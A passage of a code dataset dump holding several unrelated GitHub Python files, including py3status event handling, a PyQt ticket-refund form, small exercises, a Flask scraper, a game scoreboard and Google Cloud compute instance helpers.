self.py3_wrapper.refresh_modules(module_name)\n\n # find container that holds the module and call its onclick\n module_groups = self.py3_config[\".module_groups\"]\n containers = module_groups.get(module_name, [])\n for container in containers:\n self.process_event(container, event)\n\n def dispatch_event(self, event):\n \"\"\"\n Takes an event dict. Logs the event if needed and cleans up the dict\n such as setting the index needed for composits.\n \"\"\"\n if self.config[\"debug\"]:\n self.py3_wrapper.log(f\"received event {event}\")\n\n # usage variables\n event[\"index\"] = event.get(\"index\", \"\")\n instance = event.get(\"instance\", \"\")\n name = event.get(\"name\", \"\")\n\n # composites have an index which is passed to i3bar with\n # the instance. We need to separate this out here and\n # clean up the event. If index\n # is an integer type then cast it as such.\n if \" \" in instance:\n instance, index = instance.split(\" \", 1)\n try:\n index = int(index)\n except ValueError:\n pass\n event[\"index\"] = index\n event[\"instance\"] = instance\n\n if self.config[\"debug\"]:\n self.py3_wrapper.log(\n 'trying to dispatch event to module \"{}\"'.format(f\"{name} {instance}\".strip())\n )\n\n # guess the module config name\n module_name = f\"{name} {instance}\".strip()\n\n default_event = False\n module_info = self.output_modules.get(module_name)\n module = module_info[\"module\"]\n # execute any configured i3-msg command\n # we do not do this for containers\n # modules that have failed do not execute their config on_click\n if module.allow_config_clicks:\n button = event.get(\"button\", 0)\n on_click = self.on_click.get(module_name, {}).get(str(button))\n if on_click:\n task = EventClickTask(module_name, event, self, on_click)\n self.py3_wrapper.timeout_queue_add(task)\n # otherwise setup default action on button 2 press\n elif button == 2:\n default_event = True\n\n # do the work\n task = EventTask(module_name, event, default_event, self)\n self.py3_wrapper.timeout_queue_add(task)\n\n @profile\n def run(self):\n \"\"\"\n Wait for an i3bar JSON event, then find the right module to dispatch\n the message to based on the 'name' and 'instance' of the event.\n\n In case the module does NOT support click_events, the default\n implementation is to clear the module's cache\n when the MIDDLE button (2) is pressed on it.\n\n Example event:\n {'y': 13, 'x': 1737, 'button': 1, 'name': 'empty', 'instance': 'first'}\n \"\"\"\n try:\n while self.py3_wrapper.running:\n event_str = self.poller_inp.readline(timeout=None)\n if not event_str:\n continue\n try:\n # remove leading comma if present\n if event_str[0] == \",\":\n event_str = event_str[1:]\n event = loads(event_str)\n self.dispatch_event(event)\n except Exception:\n self.py3_wrapper.report_exception(\"Event failed\")\n except: # noqa e722\n err = \"Events thread died, click events are disabled.\"\n self.py3_wrapper.report_exception(err, notify_user=False)\n self.py3_wrapper.notify_user(err, level=\"warning\")\n","repo_name":"ultrabug/py3status","sub_path":"py3status/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":10395,"program_lang":"python","lang":"en","doc_type":"code","stars":873,"dataset":"github-code","pt":"73"} +{"seq_id":"6201554755","text":"from PyQt5.QtWidgets import *\r\n\r\n\r\nclass Tickets(QWidget):\r\n def __init__(self, cnx=None):\r\n super().__init__()\r\n self.cnx = cnx\r\n self.number = None\r\n self.cursor = cnx.cursor(buffered=True)\r\n self.initUI()\r\n\r\n def initUI(self):\r\n label = QLabel('Podaj numer transakcji: ', self)\r\n label.move(10, 20)\r\n\r\n self.number = QLineEdit(self)\r\n self.number.resize(50, 20)\r\n self.number.move(145, 18)\r\n\r\n ok_btn = QPushButton('OK', self)\r\n ok_btn.resize(50, 30)\r\n ok_btn.move(10, 60)\r\n\r\n back_btn = QPushButton('Wróć', self)\r\n back_btn.resize(50, 30)\r\n back_btn.move(110, 60)\r\n\r\n back_btn.clicked.connect(self.back_btn_click)\r\n ok_btn.clicked.connect(self.ok_btn_click)\r\n\r\n self.setGeometry(300, 300, 200, 100)\r\n self.setWindowTitle('Zwrot biletu')\r\n self.show()\r\n\r\n def back_btn_click(self):\r\n self.close()\r\n\r\n def ok_btn_click(self):\r\n try:\r\n value = int(self.number.text())\r\n ticket = ('Select * from historia_transakcji')\r\n self.cursor.execute(ticket)\r\n if self.cursor.rowcount == 0:\r\n alert = QMessageBox()\r\n alert.setText('Brak wierszy do wyświetlenia!')\r\n alert.exec_()\r\n for (i, (id, _, _, _, _, _, _)) in enumerate(self.cursor):\r\n if value == id:\r\n self.cursor.execute('select suma from historia_transakcji where id_transakcji = {}'.format(value))\r\n (suma,) = self.cursor\r\n self.cursor.execute(('delete from historia_transakcji where id_transakcji = {}'.format(value)))\r\n alert = QMessageBox()\r\n alert.setText('Pomyślnie zwrócono bilet! Zwrócona kwota wynosi {} zł'.format(suma[0]))\r\n alert.exec_()\r\n self.cnx.commit()\r\n break\r\n\r\n if i + 1 == self.cursor.rowcount:\r\n alert = QMessageBox()\r\n alert.setText('Błędny numer transakcji!')\r\n alert.exec_()\r\n\r\n except:\r\n alert = QMessageBox()\r\n alert.setText('Niepoprawne dane! Numer biletu powinien być liczbą!')\r\n alert.exec_()\r\n\r\n\r\n","repo_name":"Dawkon99/BazyDanych2-projekt","sub_path":"src/tickets.py","file_name":"tickets.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4143723740","text":"# Write the (very short) function handtodice(hand) that takes a hand, which is a 3-digit\r\n# integer, and returns 3 values, each of the 3 dice in the hand. For example:\r\n# assert(handToDice(123) == (1,2,3))\r\n# assert(handToDice(214) == (2,1,4))\r\n# assert(handToDice(422) == (4,2,2))\r\n# Hint: You might find // and % useful here, and also getKthDigit().\r\n\r\ndef handtodice(hand):\r\n\t# your code goes here\r\n\tfirst=hand//100\r\n\tsecond=(hand % 100) // 10\r\n\tthird=(hand % 10)\r\n\treturn first,second,third\r\n","repo_name":"HumpyMiryala/Competitive-Programming-Humpy","sub_path":"10-handtodice-Python/handtodice.py","file_name":"handtodice.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2362693489","text":"from tkinter import * # 임포트\n\nroot = Tk() # 변수 설정\nroot.title('GUI BASIC') # 창 이름\nroot.geometry('640x480+50+50') # 가로 * 세로 + X좌표 + Y좌표\nroot.resizable(False, False) # X, Y 창 값 변경 불가\nicon = PhotoImage(file = 'img/icon.png') # icon 변수 안에 이미지 넣어주기\nroot.iconphoto(False, icon) # False(필수) 넣고 이미지 변수 넣기\n\n\n\nlabel1 = Label(root, text='아래중에서 골라주세요').pack()\n\n\n\nradiovar = IntVar()\nbtn_radio1 = Radiobutton(root, text='1번', value=1, variable=radiovar) # variable은 공유하지만 value는 따로 지정해줘야함\nbtn_radio1.select()\nbtn_radio2 = Radiobutton(root, text='2번', value=2, variable=radiovar)\nbtn_radio3 = Radiobutton(root, text='3번', value=3, variable=radiovar)\n\nbtn_radio1.pack()\nbtn_radio2.pack()\nbtn_radio3.pack()\n\nlabel2 = Label(root, text='또 선택해주세요').pack()\n\nbtn_hehe_var = StringVar()\nbtn_hehe4 = Radiobutton(root, text='4번', value='4번', variable=btn_hehe_var)\nbtn_hehe4.select()\nbtn_hehe5 = Radiobutton(root, text='5번', value='5번', variable=btn_hehe_var)\n\nbtn_hehe4.pack()\nbtn_hehe5.pack()\n\ndef btncmd():\n print(f'라디오의 value값 : {radiovar.get()}')\n print(f'4, 5번중에는..? : {btn_hehe_var.get()}')\n\nbtn = Button(root, text='버튼', command=btncmd)\nbtn.pack()\n\nroot.mainloop() # 계속 띄우기","repo_name":"gomteeng/GUI","sub_path":"GUI_BASIC/7_radiobutton.py","file_name":"7_radiobutton.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16873753223","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Shinai Sorensen\r\n@date: October 27, 2020\r\n\r\nThis program open a text.txt file in the same folder and filters the information\r\ninto words without punctuation.\r\nCounts the number of each words then prints out the total number of words and a list\r\nof all the words and there count total.\r\n\"\"\"\r\n\r\n# Import the Counter to count all the different words in the text file\r\nfrom collections import Counter\r\n\r\n# Open the file and create a string from the contents of the text file\r\ndef retrieve_string():\r\n # Open the file and encode as UTF-8 so there are no errors\r\n myfile = open('text.txt',encoding='utf-8')\r\n \r\n # Seek the beginning of the file every time you open it\r\n myfile.seek(0)\r\n \r\n # Read the file and store in a string\r\n string = myfile.read()\r\n \r\n # Close the file\r\n myfile.close()\r\n \r\n # Split the string so you can look at each word individually\r\n return string, string.split()\r\n \r\n# Remove all punctuation and change to lowercase letters then return a filtered list\r\ndef filter_string(string, words):\r\n # Make a list of all the punctuation, except spaces (to make sure you still have words after)\r\n punc = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~''' \r\n\r\n # Loop through all the words in the list\r\n for word in words:\r\n \r\n # Loop through all the characters in a word\r\n for char in word:\r\n \r\n # If the char is a punctuation or digit, remove it\r\n if char in punc or char.isdigit():\r\n \r\n # Replace the punc with nothing (ie remove it from the word)\r\n string = string.replace(char,'')\r\n \r\n # If the char is an uppercase character, replace it with the lowercase instead\r\n if char.isupper():\r\n string = string.replace(char,char.lower())\r\n \r\n # Create a new list\r\n filter_words = string.split()\r\n \r\n return filter_words\r\n\r\n# Run the main function of the program\r\ndef run():\r\n\r\n print(\"\\nThis program open a file called 'text.txt' and prints out a counted list of words.\")\r\n\r\n # Split the string so you can look at each word individually\r\n string, words = retrieve_string()\r\n \r\n # Filter the string into a new list\r\n filter_words = filter_string(string, words)\r\n \r\n # Get the total number of words\r\n total = len(words) \r\n \r\n # Print out a summary of the findings\r\n print(f'\\nSummary: from the text file there were {total} words.')\r\n \r\n for item,num in Counter(filter_words).items():\r\n print(f'{item}:{num}') \r\n\r\n# Run the program\r\nrun()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"shinaisorensen/udemypython","sub_path":"Final Projects/Text/Count Words in a String/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"40381598664","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom movie_data_scrapper import *\n\napp = Flask(__name__)\napp.config['CORS_HEADERS'] = 'Content-Type'\nCORS(app)\n\n@app.route(\"/\")\ndef home():\n return \"Home\"\n\n@app.route(\"/get_data\", methods=[\"GET\", \"POST\"])\ndef get_data():\n data = request.args\n movie_id = data[\"movie_id\"] \n movie_data, all_persons_data = get_m_data(movie_id)\n return {\"movie_data\": movie_data, \"persons_data\": all_persons_data}\n\nif(__name__==\"__main__\"):\n app.run(debug=True)","repo_name":"bulidiriba/movie-data-scrapper","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23141625382","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom LineEmUp import LineEmUp\nimport random\n\n\nclass ScoreBoard:\n \"\"\"\n Simulates 2*r LineEmUp games and writes relevant statistics to a file\n\n Attributes:\n num_of_games_per_symbol - number of games to be simulated per color (i.e. total games = 2*r)\n destination - filepath to be written to\n average_heuristic_times\n average_state_counts\n average_depth_averages\n average_total_state_counts_p_depth\n average_ard_averages\n average_move_counter\n\n * Note that almost all attributes are simply averages of the averages calculated at the end of each game\n \"\"\"\n\n def __init__(self, r=10):\n self.num_of_games_per_symbol = r\n self.average_heuristic_times = 0\n self.average_state_counts = 0\n self.average_depth_averages = 0\n self.average_total_state_counts_p_depth = {}\n self.average_ard_averages = 0\n self.average_move_counter = 0\n self.winning_e1 = 0\n self.winning_e2 = 0\n self.destination = 'scoreboard.txt'\n\n def calculateScore(self, config):\n \"\"\"\n Runs 2*r simulations of LineEmUp and calculates all all relevant statistics.\n :return:\n \"\"\"\n n = int(config[\"conf\"][0])\n b = int(config[\"conf\"][1])\n s = int(config[\"conf\"][2])\n t = int(config[\"conf\"][3])\n d1 = int(config[\"conf\"][4])\n d2 = int(config[\"conf\"][5])\n if config[\"a1\"]:\n a1 = LineEmUp.ALPHABETA\n else:\n a1 = LineEmUp.MINIMAX\n if config[\"a2\"]:\n a2 = LineEmUp.ALPHABETA\n else:\n a2 = LineEmUp.MINIMAX\n\n if \"blocks\" in config:\n blocks = config[\"blocks\"]\n else:\n blocks = [(random.randrange(0, n), random.randrange(0, n)) for i in range(b)]\n\n self.g = LineEmUp(board_size=n, blocks=b, blocks_coord=blocks, winning_size=s, max_move_time=t, recommend=True,\n player_w=LineEmUp.AI, player_b=LineEmUp.AI, heuristic_w=LineEmUp.E1,\n heuristic_b=LineEmUp.E2, a1=a1, a2=a2, d1=d1, d2=d2)\n for play in range(0, self.num_of_games_per_symbol):\n self.g.play()\n stats = self.g.getStats()\n self.average_heuristic_times += stats[0]\n self.average_state_counts += stats[1]\n self.average_depth_averages += stats[2]\n for depth in stats[3]:\n if depth in self.average_total_state_counts_p_depth:\n self.average_total_state_counts_p_depth[depth] += stats[3][depth]\n else:\n self.average_total_state_counts_p_depth[depth] = stats[3][depth]\n\n self.average_ard_averages += stats[4]\n self.average_move_counter += stats[5]\n\n self.g = LineEmUp(board_size=n, blocks=b, blocks_coord=blocks, winning_size=s, max_move_time=t, recommend=True,\n player_w=LineEmUp.AI, player_b=LineEmUp.AI, heuristic_w=LineEmUp.E2,\n heuristic_b=LineEmUp.E1, a1=a1, a2=a2, d1=d1, d2=d2)\n for play in range(0, self.num_of_games_per_symbol):\n self.g.play()\n stats = self.g.getStats()\n self.average_heuristic_times += stats[0]\n self.average_state_counts += stats[1]\n self.average_depth_averages += stats[2]\n for depth in stats[3]:\n if depth in self.average_total_state_counts_p_depth:\n self.average_total_state_counts_p_depth[depth] += stats[3][depth]\n else:\n self.average_total_state_counts_p_depth[depth] = stats[3][depth]\n self.average_ard_averages += stats[4]\n self.average_move_counter += stats[5]\n if stats[7] == 'e1' :\n self.winning_e1 += 1\n elif stats[7] == 'e2':\n self.winning_e2 += 1\n\n self.average_heuristic_times = self.average_heuristic_times / (self.num_of_games_per_symbol * 2)\n self.average_state_counts = self.average_state_counts / (self.num_of_games_per_symbol * 2)\n self.average_depth_averages = self.average_depth_averages / (self.num_of_games_per_symbol * 2)\n for depth in stats[3]:\n self.average_total_state_counts_p_depth[depth] = self.average_total_state_counts_p_depth[depth] / (\n self.num_of_games_per_symbol * 2)\n self.average_ard_averages = self.average_ard_averages / (self.num_of_games_per_symbol * 2)\n self.average_move_counter = self.average_move_counter / (self.num_of_games_per_symbol * 2)\n\n def printAverageEndOfAllGames(self, id):\n \"\"\"\n Prints the results to a file. calculateScore() must first be called.\n\n :return:\n \"\"\"\n if self.g is None:\n raise ValueError(\"Game(s) have not been instantiated. calculateScore() must first be called. \")\n\n file = open('scoreboard' + str(id) + '.txt', 'w+')\n self.g.printIntialGameToFile(file)\n file.write(\"\")\n file.write(\"Heuristic 1 winning %: \" + str(round(self.winning_e1 / 2.0 * self.num_of_games_per_symbol, 2)) + '\\n')\n file.write(\"Heuristic 2 winning %: \" + str(round(self.winning_e2 / 2.0 * self.num_of_games_per_symbol, 2)) + '\\n')\n file.write('i. Average of Average evaluation time of heuristic: ' + str(self.average_heuristic_times) + '\\n')\n file.write('ii. Average of Total states evaluated: ' + str(self.average_state_counts) + '\\n')\n file.write('iii. Average of Average of average depths: ' + str(self.average_depth_averages) + '\\n')\n file.write('iv. Average Total number of states evaluated at each depth: ' + '\\n')\n for depth in sorted(self.average_total_state_counts_p_depth.keys(), reverse=True):\n file.write(\"\\t\" + str(depth) + \": \" + str(self.average_total_state_counts_p_depth[depth]) + '\\n')\n file.write('v. Average of Average ARD: ' + str(self.average_ard_averages) + '\\n')\n file.write('vi. Average Total Move Count: ' + str(self.average_move_counter) + '\\n')\n file.close()\n","repo_name":"stefanoScalzo/COMP472_MP2","sub_path":"ScoreBoard.py","file_name":"ScoreBoard.py","file_ext":"py","file_size_in_byte":6135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"9640160227","text":"# is_nick(string) takes 'string' and determines if it is a valid IRC nickname\n# is_nick: Str -> Bool\n# requires: isinstance(string, str)\ndef is_nick(string):\n for i, char in enumerate(string):\n if ((i > 0 and (char.isdigit() or char == '-')) or\n char.isalpha() or char in '_-\\[]{}^`|'):\n continue\n else:\n return False\n return True\n \n# is_float(object_) takes any object 'object_' and returns a boolean for\n# whether it can be converted into a float\n# is_float: Any -> Bool\ndef is_float(object_):\n try:\n float(object_)\n return True\n except:\n return False\n\n","repo_name":"KittyHawkIrc/core","sub_path":"arsenic_helper.py","file_name":"arsenic_helper.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"7416313174","text":"def lengthOfLongestConsecutiveSequence(arr, n):\n mx = 0\n \n # To store the length of current consecutive Sequence.\n count = 0\n \n # To store all the unique elements of array.\n sett = set()\n \n for element in arr:\n sett.add(element)\n \n for element in arr:\n \n previousConsecutiveElement=element-1\n \n if(not previousConsecutiveElement in sett):\n \n # Element is the first value of consecutive sequence.\n j = element\n \n while j in sett:\n \n # The next consecutive element by will be j + 1.\n j += 1\n \n # Update maximum length of consecutive subsequence.\n mx = max(mx , j-element)\n \n return mx\n","repo_name":"anuanjalijha/DSA_DictionaryAndMaps","sub_path":"LongestConsecutiveSequence.py","file_name":"LongestConsecutiveSequence.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16003161706","text":"# Rectangle into Squares\n# Level: 6kyu\n'''\nProblem Description: The drawing below gives an idea of how to cut a given \"true\" rectangle into squares \n(\"true\" rectangle meaning that the two dimensions are different).\n\nalternative text\n\nCan you translate this drawing into an algorithm?\n\nYou will be given two dimensions\n\n a positive integer length (parameter named lng)\n a positive integer width (parameter named wdth)\n\nYou will return an array with the size of each of the squares.\n\n sqInRect(5, 3) should return [3, 2, 1, 1]\n sqInRect(3, 5) should return [3, 2, 1, 1]\n'''\n\n\ndef sqInRect(lng, wdth):\n if lng == wdth:\n return None\n ans = []\n while lng != wdth:\n if lng > wdth:\n lng -= wdth\n ans.append(wdth)\n elif wdth > lng:\n wdth -= lng\n ans.append(lng)\n\n ans.append(lng)\n return ans\n\n# Test Cases\n\nprint(sqInRect(5, 5))\nprint(sqInRect(5, 3))\nprint(sqInRect(3, 5))\n","repo_name":"teabag98/A-Kata-A-Day","sub_path":"Python/Rectangle_into_Squares.py","file_name":"Rectangle_into_Squares.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"73"} +{"seq_id":"33358718905","text":"import collections\nimport re\n\nfrom googlecloudsdk.api_lib.compute import alias_ip_range_utils\nfrom googlecloudsdk.api_lib.compute import constants\nfrom googlecloudsdk.api_lib.compute import csek_utils\nfrom googlecloudsdk.api_lib.compute import image_utils\nfrom googlecloudsdk.api_lib.compute import utils\nfrom googlecloudsdk.calliope import exceptions\nfrom googlecloudsdk.command_lib.compute import scope as compute_scopes\nfrom googlecloudsdk.command_lib.compute.instances import flags\nfrom googlecloudsdk.command_lib.util.ssh import ssh\nfrom googlecloudsdk.core import log\nimport ipaddr\n\n\nEMAIL_REGEX = re.compile(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)')\n\n\ndef GetCpuRamFromCustomName(name):\n \"\"\"Gets the CPU and memory specs from the custom machine type name.\n\n Args:\n name: the custom machine type name for the 'instance create' call\n\n Returns:\n A two-tuple with the number of cpu and amount of memory for the custom\n machine type\n\n custom_cpu, the number of cpu desired for the custom machine type instance\n custom_memory_mib, the amount of ram desired in MiB for the custom machine\n type instance\n None for both variables otherwise\n \"\"\"\n check_custom = re.search('custom-([0-9]+)-([0-9]+)', name)\n if check_custom:\n custom_cpu = check_custom.group(1)\n custom_memory_mib = check_custom.group(2)\n return custom_cpu, custom_memory_mib\n return None, None\n\n\ndef GetNameForCustom(custom_cpu, custom_memory_mib, ext=False):\n \"\"\"Creates a custom machine type name from the desired CPU and memory specs.\n\n Args:\n custom_cpu: the number of cpu desired for the custom machine type\n custom_memory_mib: the amount of ram desired in MiB for the custom machine\n type instance\n ext: extended custom machine type should be used if true\n\n Returns:\n The custom machine type name for the 'instance create' call\n \"\"\"\n machine_type = 'custom-{0}-{1}'.format(custom_cpu, custom_memory_mib)\n if ext:\n machine_type += '-ext'\n return machine_type\n\n\ndef InterpretMachineType(machine_type, custom_cpu, custom_memory, ext=True):\n \"\"\"Interprets the machine type for the instance.\n\n Args:\n machine_type: name of existing machine type, eg. n1-standard\n custom_cpu: number of CPU cores for custom machine type,\n custom_memory: amount of RAM memory in bytes for custom machine type,\n ext: extended custom machine type should be used if true,\n\n Returns:\n A string representing the URL naming a machine-type.\n\n Raises:\n exceptions.RequiredArgumentException when only one of the two custom\n machine type flags are used.\n exceptions.InvalidArgumentException when both the machine type and\n custom machine type flags are used to generate a new instance.\n \"\"\"\n # Setting the machine type\n machine_type_name = constants.DEFAULT_MACHINE_TYPE\n if machine_type:\n machine_type_name = machine_type\n\n # Setting the specs for the custom machine.\n if custom_cpu or custom_memory or ext:\n if not custom_cpu:\n raise exceptions.RequiredArgumentException(\n '--custom-cpu', 'Both [--custom-cpu] and [--custom-memory] must be '\n 'set to create a custom machine type instance.')\n if not custom_memory:\n raise exceptions.RequiredArgumentException(\n '--custom-memory', 'Both [--custom-cpu] and [--custom-memory] must '\n 'be set to create a custom machine type instance.')\n if machine_type:\n raise exceptions.InvalidArgumentException(\n '--machine-type', 'Cannot set both [--machine-type] and '\n '[--custom-cpu]/[--custom-memory] for the same instance.')\n custom_type_string = GetNameForCustom(\n custom_cpu,\n # converting from B to MiB.\n int(custom_memory / (2 ** 20)),\n ext)\n\n # Updating the machine type that is set for the URIs\n machine_type_name = custom_type_string\n return machine_type_name\n\n\ndef CheckCustomCpuRamRatio(compute_client, project, zone, machine_type_name):\n \"\"\"Checks that the CPU and memory ratio is a supported custom instance type.\n\n Args:\n compute_client: GCE API client,\n project: a project,\n zone: the zone of the instance(s) being created,\n machine_type_name: The machine type of the instance being created.\n\n Returns:\n Nothing. Function acts as a bound checker, and will raise an exception from\n within the function if needed.\n\n Raises:\n utils.RaiseToolException if a custom machine type ratio is out of bounds.\n \"\"\"\n messages = compute_client.messages\n compute = compute_client.apitools_client\n if 'custom' in machine_type_name:\n mt_get_pb = messages.ComputeMachineTypesGetRequest(\n machineType=machine_type_name,\n project=project,\n zone=zone)\n mt_get_reqs = [(compute.machineTypes, 'Get', mt_get_pb)]\n errors = []\n\n # Makes a 'machine-types describe' request to check the bounds\n _ = list(compute_client.MakeRequests(\n requests=mt_get_reqs,\n errors_to_collect=errors))\n\n if errors:\n utils.RaiseToolException(\n errors,\n error_message='Could not fetch machine type:')\n\n\ndef CreateServiceAccountMessages(messages, scopes, service_account):\n \"\"\"Returns a list of ServiceAccount messages corresponding to scopes.\"\"\"\n silence_deprecation_warning = False\n if scopes is None:\n scopes = constants.DEFAULT_SCOPES\n # if user provided --no-service-account, it is already verified that\n # scopes == [] and thus service_account value will not be used\n service_account_specified = service_account is not None\n if service_account is None:\n service_account = 'default'\n\n accounts_to_scopes = collections.defaultdict(list)\n for scope in scopes:\n parts = scope.split('=')\n if len(parts) == 1:\n account = service_account\n scope_uri = scope\n elif len(parts) == 2:\n account, scope_uri = parts\n if service_account_specified:\n raise exceptions.InvalidArgumentException(\n '--scopes',\n 'It is illegal to mix old --scopes flag format '\n '[--scopes {0}={1}] with [--service-account ACCOUNT] flag. Use '\n '[--scopes {1} --service-account {2}] instead.'\n .format(account, scope_uri, service_account))\n # TODO(b/33688878) Remove support for this deprecated format\n if not silence_deprecation_warning:\n log.warning(\n 'Flag format --scopes [ACCOUNT=]SCOPE, [[ACCOUNT=]SCOPE, ...] is '\n 'deprecated and will be removed 24th Jan 2018. Use --scopes SCOPE'\n '[, SCOPE...] --service-account ACCOUNT instead.')\n silence_deprecation_warning = True # Do not warn again for each scope\n else:\n raise exceptions.ToolException(\n '[{0}] is an illegal value for [--scopes]. Values must be of the '\n 'form [SCOPE] or [ACCOUNT=SCOPE].'.format(scope))\n\n if service_account != 'default' and not ssh.Remote.FromArg(service_account):\n raise exceptions.InvalidArgumentException(\n '--service-account',\n 'Invalid format: expected default or user@domain.com, received ' +\n service_account)\n\n # Expands the scope if the user provided an alias like\n # \"compute-rw\".\n scope_uri = constants.SCOPES.get(scope_uri, [scope_uri])\n accounts_to_scopes[account].extend(scope_uri)\n\n res = []\n for account, scopes in sorted(accounts_to_scopes.iteritems()):\n res.append(messages.ServiceAccount(email=account,\n scopes=sorted(scopes)))\n return res\n\n\ndef CreateOnHostMaintenanceMessage(messages, maintenance_policy):\n \"\"\"Create on-host-maintenance message for VM.\"\"\"\n if maintenance_policy:\n on_host_maintenance = messages.Scheduling.OnHostMaintenanceValueValuesEnum(\n maintenance_policy)\n else:\n on_host_maintenance = None\n return on_host_maintenance\n\n\ndef CreateSchedulingMessage(\n messages, maintenance_policy, preemptible, restart_on_failure):\n \"\"\"Create scheduling message for VM.\"\"\"\n # Note: We always specify automaticRestart=False for preemptible VMs. This\n # makes sense, since no-restart-on-failure is defined as \"store-true\", and\n # thus can't be given an explicit value. Hence it either has its default\n # value (in which case we override it for convenience's sake to the only\n # setting that makes sense for preemptible VMs), or the user actually\n # specified no-restart-on-failure, the only usable setting.\n on_host_maintenance = CreateOnHostMaintenanceMessage(messages,\n maintenance_policy)\n if preemptible:\n scheduling = messages.Scheduling(automaticRestart=False,\n onHostMaintenance=on_host_maintenance,\n preemptible=True)\n else:\n scheduling = messages.Scheduling(automaticRestart=restart_on_failure,\n onHostMaintenance=on_host_maintenance)\n return scheduling\n\n\ndef CreateMachineTypeUris(\n resources, compute_client,\n machine_type, custom_cpu, custom_memory, ext, instance_refs):\n \"\"\"Create machine type URIs for given args and instance references.\"\"\"\n # The element at index i is the machine type URI for instance\n # i. We build this list here because we want to delay work that\n # requires API calls as much as possible. This leads to a better\n # user experience because the tool can fail fast upon a spelling\n # mistake instead of delaying the user by making API calls whose\n # purpose has already been rendered moot by the spelling mistake.\n machine_type_uris = []\n\n # Setting the machine type\n machine_type_name = InterpretMachineType(\n machine_type, custom_cpu, custom_memory, ext)\n\n for instance_ref in instance_refs:\n # Check to see if the custom machine type ratio is supported\n CheckCustomCpuRamRatio(compute_client,\n instance_ref.project,\n instance_ref.zone,\n machine_type_name)\n machine_type_uris.append(\n resources.Parse(\n machine_type_name,\n collection='compute.machineTypes',\n params={\n 'project': instance_ref.project,\n 'zone': instance_ref.zone\n }).SelfLink())\n\n return machine_type_uris\n\n\ndef CreateNetworkInterfaceMessage(resources,\n compute_client,\n network,\n subnet,\n private_network_ip,\n no_address,\n address,\n instance_refs,\n alias_ip_ranges_string=None,\n network_tier=None,\n no_public_dns=None,\n public_dns=None,\n no_public_ptr=None,\n public_ptr=None,\n no_public_ptr_domain=None,\n public_ptr_domain=None):\n \"\"\"Returns a new NetworkInterface message.\"\"\"\n # TODO(b/30460572): instance reference should have zone name, not zone URI.\n region = utils.ZoneNameToRegionName(instance_refs[0].zone.split('/')[-1])\n messages = compute_client.messages\n network_interface = messages.NetworkInterface()\n # By default interface is attached to default network. If network or subnet\n # are specified they're used instead.\n if subnet is not None:\n subnet_ref = resources.Parse(\n subnet,\n collection='compute.subnetworks',\n params={\n 'project': instance_refs[0].project,\n 'region': region\n })\n network_interface.subnetwork = subnet_ref.SelfLink()\n if network is not None:\n network_ref = resources.Parse(\n network,\n params={\n 'project': instance_refs[0].project,\n },\n collection='compute.networks')\n network_interface.network = network_ref.SelfLink()\n elif subnet is None:\n network_ref = resources.Parse(\n constants.DEFAULT_NETWORK,\n params={'project': instance_refs[0].project},\n collection='compute.networks')\n network_interface.network = network_ref.SelfLink()\n\n if private_network_ip is not None:\n # Try interpreting the address as IPv4 or IPv6.\n try:\n ipaddr.IPAddress(private_network_ip)\n network_interface.networkIP = private_network_ip\n except ValueError:\n # ipaddr could not resolve as an IPv4 or IPv6 address.\n network_interface.networkIP = flags.GetAddressRef(\n resources, private_network_ip, region).SelfLink()\n\n if alias_ip_ranges_string:\n network_interface.aliasIpRanges = (\n alias_ip_range_utils.CreateAliasIpRangeMessagesFromString(\n messages, True, alias_ip_ranges_string))\n\n if not no_address:\n access_config = messages.AccessConfig(\n name=constants.DEFAULT_ACCESS_CONFIG_NAME,\n type=messages.AccessConfig.TypeValueValuesEnum.ONE_TO_ONE_NAT)\n if network_tier is not None:\n access_config.networkTier = (messages.AccessConfig.\n NetworkTierValueValuesEnum(network_tier))\n\n # If the user provided an external IP, populate the access\n # config with it.\n # TODO(b/25278937): plays poorly when creating multiple instances\n if len(instance_refs) == 1:\n address_resource = flags.ExpandAddressFlag(\n resources, compute_client, address, region)\n if address_resource:\n access_config.natIP = address_resource\n\n if no_public_dns is True:\n access_config.setPublicDns = False\n elif public_dns is True:\n access_config.setPublicDns = True\n\n if no_public_ptr is True:\n access_config.setPublicPtr = False\n elif public_ptr is True:\n access_config.setPublicPtr = True\n\n if no_public_ptr_domain is not True and public_ptr_domain is not None:\n access_config.publicPtrDomainName = public_ptr_domain\n\n network_interface.accessConfigs = [access_config]\n\n return network_interface\n\n\ndef CreateNetworkInterfaceMessages(resources, compute_client,\n network_interface_arg, instance_refs,\n support_network_tier):\n \"\"\"Create network interface messages.\n\n Args:\n resources: generates resource references.\n compute_client: creates resources.\n network_interface_arg: CLI argument specyfying network interfaces.\n instance_refs: reference to instances that will own the generated\n interfaces.\n support_network_tier: indicates if network tier is supported.\n Returns:\n list, items are NetworkInterfaceMessages.\n \"\"\"\n result = []\n if network_interface_arg:\n for interface in network_interface_arg:\n address = interface.get('address', None)\n no_address = 'no-address' in interface\n 